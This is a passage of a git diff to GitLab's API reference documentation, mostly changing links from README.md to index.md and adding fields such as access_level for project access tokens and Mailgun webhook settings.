Description | | :-------- | :------------- | :------- | :---------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `sha` | string | yes | The blob SHA. | ## Raw blob content @@ -112,7 +112,7 @@ Supported attributes: | Attribute | Type | Required | Description | | :-------- | :------- | :------- | :---------- | -| `id` | datatype | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | datatype | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `sha` | datatype | yes | The blob SHA. | ## Get file archive @@ -137,7 +137,7 @@ Supported attributes: | Attribute | Type | Required | Description | |:------------|:---------------|:---------|:----------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `sha` | string | no | The commit SHA to download. A tag, branch reference, or SHA can be used. This defaults to the tip of the default branch if not specified. | Example request: @@ -159,7 +159,7 @@ Supported attributes: | Attribute | Type | Required | Description | | :--------- | :------------- | :------- | :---------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `from` | string | yes | The commit SHA or branch name. | | `to` | string | yes | The commit SHA or branch name. | | `from_project_id` | integer | no | The ID to compare from | @@ -220,7 +220,7 @@ Supported attributes: | Attribute | Type | Required | Description | | :--------- | :------------- | :------- | :---------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `order_by` | string | no | Return contributors ordered by `name`, `email`, or `commits` (orders by commit date) fields. Default is `commits`. | | `sort` | string | no | Return contributors sorted in `asc` or `desc` order. Default is `asc`. | @@ -252,7 +252,7 @@ GET /projects/:id/repository/merge_base | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `refs` | array | yes | The refs to find the common ancestor of, multiple refs can be passed | Example request: @@ -313,7 +313,7 @@ Supported attributes: WARNING: GitLab treats trailers case-sensitively. If you set the `trailer` field to -`Example`, GitLab _won't_ include commits that use the trailer `example`, +`Example`, GitLab _won't_ include commits that use the trailer `example`, `eXaMpLE`, or anything else that isn't _exactly_ `Example`. If the `from` attribute is unspecified, GitLab uses the Git tag of the last diff --git a/doc/api/repository_submodules.md b/doc/api/repository_submodules.md index 1d7ca903fee..06f9e514009 100644 --- a/doc/api/repository_submodules.md +++ b/doc/api/repository_submodules.md @@ -22,7 +22,7 @@ PUT /projects/:id/repository/submodules/:submodule | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `submodule` | string | yes | URL-encoded full path to the submodule. For example, `lib%2Fclass%2Erb` | | `branch` | string | yes | Name of the branch to commit into | | `commit_sha` | string | yes | Full commit SHA to update the submodule to | diff --git a/doc/api/resource_access_tokens.md b/doc/api/resource_access_tokens.md index 3b443dbb8f8..3532cfda47b 100644 --- a/doc/api/resource_access_tokens.md +++ b/doc/api/resource_access_tokens.md @@ -20,7 +20,7 @@ GET projects/:id/access_tokens | Attribute | Type | required | Description | |-----------|---------|----------|---------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/<project_id>/access_tokens" @@ -38,7 +38,8 @@ curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/a "id" : 42, "active" : true, "created_at" : "2021-01-20T22:11:48.151Z", - "revoked" : false + "revoked" : false, + "access_level": 40 } ] ``` @@ -55,15 +56,16 @@ POST projects/:id/access_tokens | Attribute | Type | required | Description | |-----------|---------|----------|---------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `name` | String | yes | The name of the project access token | | `scopes` | `Array[String]` | yes | [List of scopes](../user/project/settings/project_access_tokens.md#limiting-scopes-of-a-project-access-token) | +| `access_level` | Integer | no | A valid access level. Default value is 40 (Maintainer). Other allowed values are 10 (Guest), 20 (Reporter), and 30 (Developer). | | `expires_at` | Date | no | The token expires at midnight UTC on that date | ```shell curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" \ --header "Content-Type:application/json" \ ---data '{ "name":"test_token", "scopes":["api", "read_repository"], "expires_at":"2021-01-31" }' \ +--data '{ "name":"test_token", "scopes":["api", "read_repository"], "expires_at":"2021-01-31", "access_level": 30 }' \ "https://gitlab.example.com/api/v4/projects/<project_id>/access_tokens" ``` @@ -80,7 +82,8 @@ curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" \ "user_id" : 166, "id" : 58, "expires_at" : "2021-01-31", - "token" : "D4y...Wzr" + "token" : "D4y...Wzr", + "access_level": 30 } ``` @@ -96,7 +99,7 @@ DELETE projects/:id/access_tokens/:token_id | Attribute | Type | required | Description | |-----------|---------|----------|---------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `token_id` | integer or string | yes | The ID of the project access token | ```shell diff --git a/doc/api/resource_iteration_events.md b/doc/api/resource_iteration_events.md index 91c7a1b07ea..f4463a4746d 100644 --- a/doc/api/resource_iteration_events.md +++ b/doc/api/resource_iteration_events.md @@ -26,7 +26,7 @@ GET /projects/:id/issues/:issue_iid/resource_iteration_events | Attribute | Type | Required | Description | | ----------- | -------------- | -------- | ------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `issue_iid` | integer | yes | The IID of an issue | Example request: @@ -108,7 +108,7 @@ Parameters: | Attribute | Type | Required | Description | | ----------------------------- | -------------- | -------- | ------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path](README.md#namespaced-path-encoding) of the project | +| `id` | integer/string | yes | The ID or [URL-encoded path](index.md#namespaced-path-encoding) of the project | | `issue_iid` | integer | yes | The IID of an issue | | `resource_iteration_event_id` | integer | yes | The ID of an iteration event | diff --git a/doc/api/resource_label_events.md b/doc/api/resource_label_events.md index 5fc7a0a52bd..c5292059c0f 100644 --- a/doc/api/resource_label_events.md +++ b/doc/api/resource_label_events.md @@ -21,7 +21,7 @@ GET /projects/:id/issues/:issue_iid/resource_label_events | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ------------ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `issue_iid` | integer | yes | The IID of an issue | ```json @@ -87,7 +87,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `issue_iid` | integer | yes | The IID of an issue | | `resource_label_event_id` | integer | yes | The ID of a label event | @@ -107,7 +107,7 @@ GET /groups/:id/epics/:epic_id/resource_label_events | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ------------ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `epic_id` | integer | yes | The ID of an epic | ```json @@ -173,7 +173,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `epic_id` | integer | yes | The ID of an epic | | `resource_label_event_id` | integer | yes | The ID of a label event | @@ -193,7 +193,7 @@ GET /projects/:id/merge_requests/:merge_request_iid/resource_label_events | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ------------ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of a merge request | ```json @@ -259,7 +259,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of a merge request | | `resource_label_event_id` | integer | yes | The ID of a label event | diff --git a/doc/api/resource_milestone_events.md b/doc/api/resource_milestone_events.md index df51584a4ed..75ecd986e4c 100644 --- a/doc/api/resource_milestone_events.md +++ b/doc/api/resource_milestone_events.md @@ -4,12 +4,12 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Resource milestone events API +# Resource milestone events API **(FREE)** > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/31720) in GitLab 13.1. -Resource milestone events keep track of what happens to GitLab [issues](../user/project/issues/) and -[merge requests](../user/project/merge_requests/). +Resource [milestone](../user/project/milestones/index.md) events keep track of what happens to +GitLab [issues](../user/project/issues/) and [merge requests](../user/project/merge_requests/). Use them to track which milestone was added or removed, who did it, and when it happened. @@ -25,7 +25,7 @@ GET /projects/:id/issues/:issue_iid/resource_milestone_events | Attribute | Type | Required | Description | | ----------- | -------------- | -------- | ------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `issue_iid` | integer | yes | The IID of an issue | Example request: @@ -109,7 +109,7 @@ Parameters: | Attribute | Type | Required | Description | | ----------------------------- | -------------- | -------- | ------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path](README.md#namespaced-path-encoding) of the project | +| `id` | integer/string | yes | The ID or [URL-encoded path](index.md#namespaced-path-encoding) of the project | | `issue_iid` | integer | yes | The IID of an issue | | `resource_milestone_event_id` | integer | yes | The ID of a milestone event | @@ -131,7 +131,7 @@ GET /projects/:id/merge_requests/:merge_request_iid/resource_milestone_events | Attribute | Type | Required | Description | | ------------------- | -------------- | -------- | ------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path](README.md#namespaced-path-encoding) of the project | +| `id` | integer/string | yes | The ID or [URL-encoded path](index.md#namespaced-path-encoding) of the project | | `merge_request_iid` | integer | yes | The IID of a merge request | Example request: @@ -215,7 +215,7 @@ Parameters: | Attribute | Type | Required | Description | | ----------------------------- | -------------- | -------- | ------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of a merge request | | `resource_milestone_event_id` | integer | yes | The ID of a milestone event | diff --git a/doc/api/resource_state_events.md b/doc/api/resource_state_events.md index e81b7ddd272..950d82a92a4 100644 --- a/doc/api/resource_state_events.md +++ b/doc/api/resource_state_events.md @@ -4,7 +4,7 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Resource state events API +# Resource state events API **(FREE)** > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/35210/) in GitLab 13.2. @@ -25,7 +25,7 @@ GET /projects/:id/issues/:issue_iid/resource_state_events | Attribute | Type | Required | Description | | ----------- | -------------- | -------- | ------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `issue_iid` | integer | yes | The IID of an issue | Example request: @@ -83,7 +83,7 @@ Parameters: | Attribute | Type | Required | Description | | ----------------------------- | -------------- | -------- | ------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path](README.md#namespaced-path-encoding) of the project | +| `id` | integer/string | yes | The ID or [URL-encoded path](index.md#namespaced-path-encoding) of the project | | `issue_iid` | integer | yes | The IID of an issue | | `resource_state_event_id` | integer | yes | The ID of a state event | @@ -125,7 +125,7 @@ GET /projects/:id/merge_requests/:merge_request_iid/resource_state_events | Attribute | Type | Required | Description | | ------------------- | -------------- | -------- | ------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path](README.md#namespaced-path-encoding) of the project | +| `id` | integer/string | yes | The ID or [URL-encoded path](index.md#namespaced-path-encoding) of the project | | `merge_request_iid` | integer | yes | The IID of a merge request | Example request: @@ -183,7 +183,7 @@ Parameters: | Attribute | Type | Required | Description | | ----------------------------- | -------------- | -------- | ------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of a merge request | | `resource_state_event_id` | integer | yes | The ID of a state event | diff --git a/doc/api/resource_weight_events.md b/doc/api/resource_weight_events.md index 44c20c5bca8..8f11f0c984b 100644 --- a/doc/api/resource_weight_events.md +++ b/doc/api/resource_weight_events.md @@ -4,7 +4,7 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Resource weight events API +# Resource weight events API **(FREE)** > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/32542) in GitLab 13.2. @@ -24,7 +24,7 @@ GET /projects/:id/issues/:issue_iid/resource_weight_events | Attribute | Type | Required | Description | | ----------- | -------------- | -------- | ------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `issue_iid` | integer | yes | The IID of an issue | Example request: @@ -80,7 +80,7 @@ Parameters: | Attribute | Type | Required | Description | | ----------------------------- | -------------- | -------- | ------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path](README.md#namespaced-path-encoding) of the project | +| `id` | integer/string | yes | The ID or [URL-encoded path](index.md#namespaced-path-encoding) of the project | | `issue_iid` | integer | yes | The IID of an issue | | `resource_weight_event_id` | integer | yes | The ID of a weight event | diff --git a/doc/api/runners.md b/doc/api/runners.md index 951e72edcb5..9e48331cdea 100644 --- a/doc/api/runners.md +++ b/doc/api/runners.md @@ -14,7 +14,7 @@ There are two tokens to take into account when connecting a runner with GitLab. | Token | Description | | ----- | ----------- | -| Registration token | Token used to [register the runner](https://docs.gitlab.com/runner/register/). It can be [obtained through GitLab](../ci/runners/README.md). | +| Registration token | Token used to [register the runner](https://docs.gitlab.com/runner/register/). It can be [obtained through GitLab](../ci/runners/index.md). | | Authentication token | Token used to authenticate the runner with the GitLab instance. It is obtained either automatically when [registering a runner](https://docs.gitlab.com/runner/register/), or manually when [registering the runner via the Runner API](#register-a-new-runner). | Here's an example of how the two tokens are used in runner registration: @@ -164,7 +164,7 @@ Example response: Get details of a runner. -The [Maintainer role or higher](../user/permissions.md) is required to get runner details at the +At least the [Maintainer role](../user/permissions.md) is required to get runner details at the project and group level. Instance-level runner details via this endpoint are available to all signed in users. @@ -410,7 +410,7 @@ GET /projects/:id/runners?tag_list=tag1,tag2 | Attribute | Type | Required | Description | |------------|----------------|----------|---------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `scope` | string | no | Deprecated: Use `type` or `status` instead. The scope of specific runners to show, one of: `active`, `paused`, `online`, `offline`; showing all runners if none provided | | `type` | string | no | The type of runners to show, one of: `instance_type`, `group_type`, `project_type` | | `status` | string | no | The status of runners to show, one of: `active`, `paused`, `online`, `offline` | @@ -459,7 +459,7 @@ POST /projects/:id/runners | Attribute | Type | Required | Description | |-------------|---------|----------|---------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `runner_id` | integer | yes | The ID of a runner | ```shell @@ -495,7 +495,7 @@ DELETE /projects/:id/runners/:runner_id | Attribute | Type | Required | Description | |-------------|---------|----------|---------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `runner_id` | integer | yes | The ID of a runner | ```shell diff --git a/doc/api/search.md b/doc/api/search.md index 9714bc17f62..d3a2f9c41b6 100644 --- a/doc/api/search.md +++ b/doc/api/search.md @@ -444,7 +444,7 @@ GET /groups/:id/search | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ---------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `scope` | string | yes | The scope to search in | | `search` | string | yes | The search query | | `state` | string | no | Filter by state. Issues and merge requests are supported; it is ignored for other scopes. | @@ -836,7 +836,7 @@ GET /projects/:id/search | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ---------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `scope` | string | yes | The scope to search in | | `search` | string | yes | The search query | | `ref` | string | no | The name of a repository branch or tag to search on. The project's default branch is used by default. This is only applicable for scopes: commits, blobs, and wiki_blobs. | diff --git a/doc/api/services.md b/doc/api/services.md index 0a26a88de70..3652dd99fcd 100644 --- a/doc/api/services.md +++ b/doc/api/services.md @@ -258,7 +258,8 @@ GET /projects/:id/services/buildkite ## Campfire -Simple web-based real-time group chat +Send notifications about push events to Campfire chat rooms. +Note that [new users can no longer sign up for Campfire](https://basecamp.com/retired/campfire). ### Create/Edit Campfire service @@ -270,12 +271,12 @@ PUT /projects/:id/services/campfire Parameters: -| Parameter | Type | Required | Description | -| --------- | ---- | -------- | ----------- | -| `token` | string | true | Campfire token | -| `subdomain` | string | false | Campfire subdomain | -| `room` | string | false | Campfire room | -| `push_events` | boolean | false | Enable notifications for push events | +| Parameter | Type | Required | Description | +|---------------|---------|----------|---------------------------------------------------------------------------------------------| +| `token` | string | true | Campfire API token. To find it, log into Campfire and select **My info**. | +| `subdomain` | string | false | Campfire subdomain. Text between `https://` and `.campfirenow.com` when you're logged in. | +| `room` | string | false | Campfire room. The last part of the URL when you're in a room. | +| `push_events` | boolean | false | Enable notifications for push events. | ### Delete Campfire service @@ -955,13 +956,15 @@ Get Pipeline-Emails service settings for a project. GET /projects/:id/services/pipelines-email ``` -## PivotalTracker +## Pivotal Tracker -Project Management Software (Source Commits Endpoint) +Add commit messages as comments to Pivotal Tracker stories. + +See also the [Pivotal Tracker service documentation](../user/project/integrations/pivotal_tracker.md). -### Create/Edit PivotalTracker service +### Create/Edit Pivotal Tracker service -Set PivotalTracker service for a project. +Set Pivotal Tracker service for a project. ```plaintext PUT /projects/:id/services/pivotaltracker @@ -971,21 +974,21 @@ Parameters: | Parameter | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `token` | string | true | The PivotalTracker token | +| `token` | string | true | The Pivotal Tracker token | | `restrict_to_branch` | boolean | false | Comma-separated list of branches to automatically inspect. Leave blank to include all branches. | | `push_events` | boolean | false | Enable notifications for push events | -### Delete PivotalTracker service +### Delete Pivotal Tracker service -Delete PivotalTracker service for a project. +Delete Pivotal Tracker service for a project. ```plaintext DELETE /projects/:id/services/pivotaltracker ``` -### Get PivotalTracker service settings +### Get Pivotal Tracker service settings -Get PivotalTracker service settings for a project. +Get Pivotal Tracker service settings for a project. ```plaintext GET /projects/:id/services/pivotaltracker diff --git a/doc/api/settings.md b/doc/api/settings.md index 8225713fc00..d49dca96dfd 100644 --- a/doc/api/settings.md +++ b/doc/api/settings.md @@ -258,7 +258,7 @@ listed in the descriptions of the relevant settings. | `disabled_oauth_sign_in_sources` | array of strings | no | Disabled OAuth sign-in sources. | | `dns_rebinding_protection_enabled` | boolean | no | Enforce DNS rebinding attack protection. | | `domain_denylist_enabled` | boolean | no | (**If enabled, requires:** `domain_denylist`) Allows blocking sign-ups from emails from specific domains. | -| `domain_denylist` | array of strings | no | Users with e-mail addresses that match these domain(s) **cannot** sign up. Wildcards allowed. Use separate lines for multiple entries. Ex: `domain.com`, `*.domain.com`. | +| `domain_denylist` | array of strings | no | Users with email addresses that match these domain(s) **cannot** sign up. Wildcards allowed. Use separate lines for multiple entries. Ex: `domain.com`, `*.domain.com`. | | `domain_allowlist` | array of strings | no | Force people to use only corporate emails for sign-up. Default is `null`, meaning there is no restriction. | | `dsa_key_restriction` | integer | no | The minimum allowed bit length of an uploaded DSA key. Default is `0` (no restriction). `-1` disables DSA keys. | | `ecdsa_key_restriction` | integer | no | The minimum allowed curve size (in bits) of an uploaded ECDSA key. Default is `0` (no restriction). `-1` disables ECDSA keys. | @@ -328,6 +328,8 @@ listed in the descriptions of the relevant settings. | `issues_create_limit` | integer | no | Max number of issue creation requests per minute per user. Disabled by default.| | `keep_latest_artifact` | boolean | no | Prevent the deletion of the artifacts from the most recent successful jobs, regardless of the expiry time. Enabled by default. | | `local_markdown_version` | integer | no | Increase this value when any cached Markdown should be invalidated. | +| `mailgun_signing_key` | string | no | The Mailgun HTTP webhook signing key for receiving events from webhook | +| `mailgun_events_enabled` | boolean | no | Enable Mailgun event receiver. | | `maintenance_mode_message` | string | no | **(PREMIUM)** Message displayed when instance is in maintenance mode. | | `maintenance_mode` | boolean | no | **(PREMIUM)** When instance is in maintenance mode, non-administrative users can sign in with read-only access and make read-only API requests. | | `max_artifacts_size` | integer | no | Maximum artifacts size in MB. | @@ -413,7 +415,7 @@ listed in the descriptions of the relevant settings. | `unique_ips_limit_time_window` | integer | required by: `unique_ips_limit_enabled` | How many seconds an IP is counted towards the limit. | | `usage_ping_enabled` | boolean | no | Every week GitLab reports license usage back to GitLab, Inc. | | `user_default_external` | boolean | no | Newly registered users are external by default. | -| `user_default_internal_regex` | string | no | Specify an e-mail address regex pattern to identify default internal users. | +| `user_default_internal_regex` | string | no | Specify an email address regex pattern to identify default internal users. | | `user_oauth_applications` | boolean | no | Allow users to register any application to use GitLab as an OAuth provider. | | `user_show_add_ssh_key_message` | boolean | no | When set to `false` disable the `You won't be able to pull or push project code via SSH` warning shown to users with no uploaded SSH key. | | `version_check_enabled` | boolean | no | Let GitLab inform you when an update is available. | diff --git a/doc/api/snippet_repository_storage_moves.md b/doc/api/snippet_repository_storage_moves.md index 3454073cc8c..9951e073c39 100644 --- a/doc/api/snippet_repository_storage_moves.md +++ b/doc/api/snippet_repository_storage_moves.md @@ -16,19 +16,19 @@ example. As snippet repository storage moves are processed, they transition through different states. Values of `state` are: -- `initial` -- `scheduled` -- `started` -- `finished` -- `failed` -- `replicated` -- `cleanup failed` +- `initial`: The record has been created but the background job has not yet been scheduled. +- `scheduled`: The background job has been scheduled. +- `started`: The snippet repository is being copied to the destination storage. +- `replicated`: The snippet has been moved. +- `failed`: The snippet repository failed to copy or the checksum did not match. +- `finished`: The snippet has been moved and the repository on the source storage has been deleted. +- `cleanup failed`: The snippet has been moved but the repository on the source storage could not be deleted. To ensure data integrity, snippets are put in a temporary read-only state for the duration of the move. During this time, users receive a `The repository is temporarily read-only. Please try again later.` message if they try to push new commits. -This API requires you to [authenticate yourself](README.md#authentication) as an administrator. +This API requires you to [authenticate yourself](index.md#authentication) as an administrator. For other repository types see: @@ -42,7 +42,7 @@ GET /snippet_repository_storage_moves ``` By default, `GET` requests return 20 results at a time because the API results -are [paginated](README.md#pagination). +are [paginated](index.md#pagination). Example request: @@ -84,7 +84,7 @@ GET /snippets/:snippet_id/repository_storage_moves ``` By default, `GET` requests return 20 results at a time because the API results -are [paginated](README.md#pagination). +are [paginated](index.md#pagination). Supported attributes: diff --git a/doc/api/status_checks.md b/doc/api/status_checks.md index f4e384a2efb..25ccd5d767a 100644 --- a/doc/api/status_checks.md +++ b/doc/api/status_checks.md @@ -7,14 +7,8 @@ type: reference, api # External Status Checks API **(ULTIMATE)** -> - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/3869) in GitLab 14.0. -> - It's [deployed behind a feature flag](../user/feature_flags.md), disabled by default. -> - It's disabled on GitLab.com. -> - It's not recommended for production use. -> - To use it in GitLab self-managed instances, ask a GitLab administrator to [enable it](#enable-or-disable-status-checks). **(ULTIMATE SELF)** - -WARNING: -This feature might not be available to you. Check the **version history** note above for details. +> - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/3869) in GitLab 14.0, disabled behind the `:ff_external_status_checks` feature flag. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/320783) in GitLab 14.1. ## List status checks for a merge request @@ -58,22 +52,16 @@ POST /projects/:id/merge_requests/:merge_request_iid/status_check_responses **Parameters:** -| Attribute | Type | Required | Description | -| ------------------------ | ------- | -------- | -------------------------------------- | -| `id` | integer | yes | ID of a project | -| `merge_request_iid` | integer | yes | IID of a merge request | -| `sha` | string | yes | SHA at `HEAD` of the source branch | +| Attribute | Type | Required | Description | +| -------------------------- | ------- | -------- | ------------------------------------- | +| `id` | integer | yes | ID of a project | +| `merge_request_iid` | integer | yes | IID of a merge request | +| `sha` | string | yes | SHA at `HEAD` of the source branch | +| `external_status_check_id` | integer | yes | ID of an external status check | NOTE: `sha` must be the SHA at the `HEAD` of the merge request's source branch. -## Enable or disable status checks **(ULTIMATE SELF)** - -Status checks are under development and not ready for production use. It is -deployed behind a feature flag that is **disabled by default**. -[GitLab administrators with access to the GitLab Rails console](../administration/feature_flags.md) -can enable it. - ## Get project external status checks **(ULTIMATE)** You can request information about a project's external status checks using the following endpoint: @@ -86,7 +74,7 @@ GET /projects/:id/external_status_checks | Attribute | Type | Required | Description | |---------------------|---------|----------|---------------------| -| `id` | integer | yes | The ID of a project | +| `id` | integer | yes | ID of a project | ```json [ @@ -109,7 +97,7 @@ GET /projects/:id/external_status_checks ] ``` -### Create external status check **(ULTIMATE)** +## Create external status check **(ULTIMATE)** You can create a new external status check for a project using the following endpoint: @@ -117,14 +105,18 @@ You can create a new external status check for a project using the following end POST /projects/:id/external_status_checks ``` -| Attribute | Type | Required | Description | -|------------------------|----------------|----------|----------------------------------------------------| -| `id` | integer | yes | The ID of a project | -| `name` | string | yes | Display name of status check | -| `external_url` | string | yes | URL of status check resource | -| `protected_branch_ids` | `array<Integer>` | no | The ids of protected branches to scope the rule by | +WARNING: +External status checks send information about all applicable merge requests to the +defined external service. This includes confidential merge requests. + +| Attribute | Type | Required | Description | +|------------------------|------------------|----------|------------------------------------------------| +| `id` | integer | yes | ID of a project | +| `name` | string | yes | Display name of status check | +| `external_url` | string | yes | URL of status check resource | +| `protected_branch_ids` | `array<Integer>` | no | IDs of protected branches to scope the rule by | -### Delete external status check **(ULTIMATE)** +## Delete external status check **(ULTIMATE)** You can delete an external status check for a project using the following endpoint: @@ -132,12 +124,12 @@ You can delete an external status check for a project using the following endpoi DELETE /projects/:id/external_status_checks/:check_id ``` -| Attribute | Type | Required | Description | -|------------------------|----------------|----------|----------------------------------------------------| -| `rule_id` | integer | yes | The ID of an status check | -| `id` | integer | yes | The ID of a project | +| Attribute | Type | Required | Description | +|------------------------|----------------|----------|-----------------------| +| `rule_id` | integer | yes | ID of an status check | +| `id` | integer | yes | ID of a project | -### Update external status check **(ULTIMATE)** +## Update external status check **(ULTIMATE)** You can update an existing external status check for a project using the following endpoint: @@ -145,57 +137,14 @@ You can update an existing external status check for a project using the followi PUT /projects/:id/external_status_checks/:check_id ``` -| Attribute | Type | Required | Description | -|------------------------|----------------|----------|----------------------------------------------------| -| `id` | integer | yes | The ID of a project | -| `rule_id` | integer | yes | The ID of an external status check | -| `name` | string | no | Display name of status check | -| `external_url` | string | no | URL of external status check resource | -| `protected_branch_ids` | `array<Integer>` | no | The ids of protected branches to 